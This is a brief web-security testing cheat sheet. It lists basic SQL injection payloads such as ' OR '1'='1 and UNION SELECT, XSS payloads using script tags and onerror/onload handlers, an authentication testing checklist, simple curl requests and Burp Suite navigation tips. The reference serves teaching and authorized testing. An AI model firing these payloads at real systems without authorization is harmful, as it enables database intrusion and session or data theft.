Cheat Sheets
Quick reference guides for common security testing tasks.
SQL Injection
Basic Payloads
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' UNION SELECT NULL--
Testing for SQL Injection
- Try single quote:
' - Try basic payload:
' OR '1'='1 - Test with comment:
'--or'# - Attempt UNION:
' UNION SELECT NULL--
XSS (Cross-Site Scripting)
Basic Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
Testing for XSS
- Test basic script tag
- Try event handlers:
onerror,onload,onclick - Test encoding:
%3Cscript%3E - Try in different contexts: HTML, JavaScript, attributes
Authentication Testing
Common Tests
- SQL injection in login forms
- Weak password policies
- Account enumeration
- Session management flaws
- Password reset vulnerabilities
Quick Commands
curl Examples
# Basic GET request
curl https://example.com
# POST request with data
curl -X POST https://example.com/login -d "user=admin&pass=test"
# With headers
curl -H "Authorization: Bearer token" https://example.com/api
Browser Developer Tools
Network Tab
- View HTTP requests and responses
- Check headers and cookies
- Analyze request timing
Console Tab
- Execute JavaScript
- View errors and warnings
- Test payloads
Application Tab
- View and edit cookies
- Check local storage
- Inspect session storage
Burp Suite Quick Reference
Proxy
- Intercept requests: Proxy → Intercept (toggle on/off)
- View history: Proxy → HTTP history
- Configure: Proxy → Options
Repeater
- Send requests: Right-click in Proxy → Send to Repeater
- Modify and resend: Edit request, click Go
- Compare responses: Use diff feature